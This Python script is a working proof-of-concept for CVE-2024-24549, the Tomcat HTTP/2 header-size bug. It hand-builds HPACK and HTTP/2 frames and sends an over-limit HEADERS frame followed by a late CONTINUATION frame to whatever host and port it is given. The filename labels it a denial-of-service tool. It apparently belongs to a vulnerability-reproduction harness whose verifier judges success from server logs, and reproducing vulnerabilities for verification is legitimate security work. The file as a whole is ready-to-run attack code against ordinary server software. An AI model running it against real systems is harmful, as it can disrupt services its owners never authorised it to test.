#!/usr/bin/env python3
"""
CVE-2024-24549 PoC: HTTP/2 over-limit header block split across HEADERS +
CONTINUATION frames against Apache Tomcat (h2c, prior-knowledge).

The script speaks raw HTTP/2 over cleartext using only the Python stdlib
(socket/struct). HPACK is hand-encoded with "literal header field never
indexed / new name, no Huffman" representations so no external library and no
dynamic-table accounting is needed.

Trigger sequence on a single stream (stream id 1):
  1. Send the HTTP/2 connection preface + an empty SETTINGS frame, ACK server
     SETTINGS.
  2. Send a HEADERS frame carrying the mandatory pseudo-headers plus enough
     bulky regular headers that the cumulative decoded header size ALREADY
     exceeds the connector's maxHttpHeaderSize (pinned to 8192). The HEADERS
     frame is sent WITHOUT the END_HEADERS flag, so the server must keep
     reading the block.
  3. Pause, then send a CONTINUATION frame (WITH END_HEADERS) carrying one more
     header. This frame is sent AFTER the limit was already exceeded.

A patched (eager-validation) server would RST_STREAM after the HEADERS frame,
before consuming the trailing CONTINUATION frame. The vulnerable server defers
validateHeaders() to onHeadersComplete(), so it reads and HPACK-decodes the
CONTINUATION frame too and only then resets the stream -- emitting a
StreamException whose server-side stack trace contains
org.apache.coyote.http2.Http2Parser.onHeadersComplete (the load-bearing
discriminator captured by the verifier on the server diagnostic channel).

This script only triggers the bug; it does not judge success. It prints the
frames it sends/receives to stderr for diagnosis, but the verdict comes from
the server-side log, not from this stdout.
"""

import socket
import struct
import sys
import time

PREFACE = b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"

# Frame types
FT_DATA = 0x0
FT_HEADERS = 0x1
FT_RST_STREAM = 0x3
FT_SETTINGS = 0x4
FT_GOAWAY = 0x7
FT_CONTINUATION = 0x9

# HEADERS / CONTINUATION flags
FLAG_END_STREAM = 0x1
FLAG_END_HEADERS = 0x4
FLAG_ACK = 0x1


def hpack_int(value, prefix_bits, prefix_value=0):
    """Encode an integer per HPACK (RFC 7541 sec 5.1)."""
    max_prefix = (1 << prefix_bits) - 1
    out = bytearray()
    if value < max_prefix:
        out.append(prefix_value | value)
        return bytes(out)
    out.append(prefix_value | max_prefix)
    value -= max_prefix
    while value >= 128:
        out.append((value % 128) + 128)
        value //= 128
    out.append(value)
    return bytes(out)


def hpack_literal_new_name(name, value):
    """Literal header field never indexed, new name, no Huffman (RFC 7541 6.2.3).

    First byte 0x10 (0001 with 4-bit index prefix == 0 -> new name).
    """
    name_b = name.encode("ascii")
    val_b = value.encode("latin-1")
    out = bytearray()
    out.append(0x10)  # "Literal Header Field Never Indexed -- New Name"
    out += hpack_int(len(name_b), 7, 0x00)  # H=0, no Huffman
    out += name_b
    out += hpack_int(len(val_b), 7, 0x00)
    out += val_b
    return bytes(out)


def build_frame(frame_type, flags, stream_id, payload):
    length = len(payload)
    header = struct.pack(">I", length)[1:]  # 24-bit length
    header += struct.pack(">B", frame_type)
    header += struct.pack(">B", flags)
    header += struct.pack(">I", stream_id & 0x7FFFFFFF)
    return header + payload


def recv_frames(sock, duration):
    """Read whatever the server sends for `duration` seconds; print frame headers."""
    sock.settimeout(0.5)
    end = time.time() + duration
    buf = b""
    while time.time() < end:
        try:
            data = sock.recv(65535)
        except socket.timeout:
            continue
        except OSError as e:
            sys.stderr.write(f"[recv] socket error: {e}\n")
            break
        if not data:
            sys.stderr.write("[recv] server closed connection\n")
            break
        buf += data
        while len(buf) >= 9:
            length = int.from_bytes(buf[0:3], "big")
            if len(buf) < 9 + length:
                break
            ftype = buf[3]
            flags = buf[4]
            sid = int.from_bytes(buf[5:9], "big") & 0x7FFFFFFF
            payload = buf[9 : 9 + length]
            buf = buf[9 + length :]
            name = {
                FT_DATA: "DATA",
                FT_HEADERS: "HEADERS",
                FT_RST_STREAM: "RST_STREAM",
                FT_SETTINGS: "SETTINGS",
                FT_GOAWAY: "GOAWAY",
                FT_CONTINUATION: "CONTINUATION",
            }.get(ftype, f"0x{ftype:x}")
            extra = ""
            if ftype == FT_RST_STREAM and len(payload) >= 4:
                extra = f" error_code={int.from_bytes(payload[0:4], 'big')}"
            if ftype == FT_GOAWAY and len(payload) >= 8:
                extra = (f" last_stream={int.from_bytes(payload[0:4], 'big')}"
                         f" error_code={int.from_bytes(payload[4:8], 'big')}")
            sys.stderr.write(
                f"[recv] frame={name} flags=0x{flags:02x} stream={sid} len={length}{extra}\n"
            )


def main():
    if len(sys.argv) < 3:
        sys.stderr.write("usage: h2_continuation_dos.py <host> <port> [pause_seconds]\n")
        sys.exit(2)
    host = sys.argv[1]
    port = int(sys.argv[2])
    pause = float(sys.argv[3]) if len(sys.argv) > 3 else 0.4

    sock = socket.create_connection((host, port), timeout=10)
    sys.stderr.write(f"[*] connected to {host}:{port}\n")

    # 1. Preface + our SETTINGS (empty).
    sock.sendall(PREFACE)
    sock.sendall(build_frame(FT_SETTINGS, 0x0, 0, b""))
    # ACK the server's SETTINGS (best effort; send an ACK).
    sock.sendall(build_frame(FT_SETTINGS, FLAG_ACK, 0, b""))
    sys.stderr.write("[*] sent preface + SETTINGS + SETTINGS ACK\n")

    stream_id = 1

    # 2. Build a HEADERS payload that ALREADY exceeds maxHttpHeaderSize (8192).
    #    Tomcat counts the decoded (name + value + overhead) size. We send the
    #    mandatory pseudo-headers, then bulky x-junk headers totalling well over
    #    8 KB of decoded header data, all inside the HEADERS frame.
    block = bytearray()
    block += hpack_literal_new_name(":method", "GET")
    block += hpack_literal_new_name(":scheme", "http")
    block += hpack_literal_new_name(":authority", f"{host}:{port}")
    block += hpack_literal_new_name(":path", "/")
    # ~12 KB of regular headers -> over the 8192 limit while still inside the
    # single HEADERS frame, so the limit is breached BEFORE the CONTINUATION.
    junk_value = "A" * 1000
    for i in range(12):
        block += hpack_literal_new_name(f"x-junk-{i:02d}", junk_value)

    headers_frame = build_frame(FT_HEADERS, 0x0, stream_id, bytes(block))  # no END_HEADERS
    sock.sendall(headers_frame)
    sys.stderr.write(
        f"[*] sent HEADERS (no END_HEADERS) stream={stream_id} "
        f"junk_header_value_bytes={12*1000} payload_len={len(block)}\n"
    )

    # 3. Pace, then send a CONTINUATION frame AFTER the limit is already exceeded.
    time.sleep(pause)
    cont_block = hpack_literal_new_name("x-after-limit", "B" * 200)
    cont_frame = build_frame(FT_CONTINUATION, FLAG_END_HEADERS, stream_id, cont_block)
    sock.sendall(cont_frame)
    sys.stderr.write(
        "[*] sent CONTINUATION (END_HEADERS) AFTER the over-limit HEADERS frame\n"
    )

    # Read the server's reaction (RST_STREAM / GOAWAY) for diagnosis.
    recv_frames(sock, duration=2.0)
    try:
        sock.close()
    except OSError:
        pass
    sys.stderr.write("[*] done\n")


if __name__ == "__main__":
    main()
